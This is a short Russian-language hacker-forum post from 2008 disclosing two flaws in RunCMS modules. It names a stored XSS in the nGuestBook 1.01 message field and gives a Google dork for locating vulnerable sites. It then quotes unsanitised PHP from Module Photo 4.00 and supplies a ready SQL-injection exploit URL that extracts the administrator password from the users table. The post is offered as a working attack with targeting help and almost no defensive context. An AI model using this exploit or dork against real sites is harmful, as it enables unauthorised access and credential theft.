Показать сообщение отдельно

  #7  
Старый 26.04.2008, 23:06
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

RunCMS Module nGuestBook 1.01 Active XSS

Add message => Message => [XSS]

dork: inurl:/modules/nguestbook/


SQL Injection

Vulnerable: Module Photo 4.00


Vuln code:
PHP код:
.....
include_once(
PHOTO_PATH."/class/bama_cat.php");
$id $HTTP_GET_VARS['id'];
if (isset(
$HTTP_GET_VARS['cid'])) {
..... 
Exploit:
Код:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1
ZAMUT (c)

Последний раз редактировалось ZAMUT; 29.04.2008 в 00:51..
 
Ответить с цитированием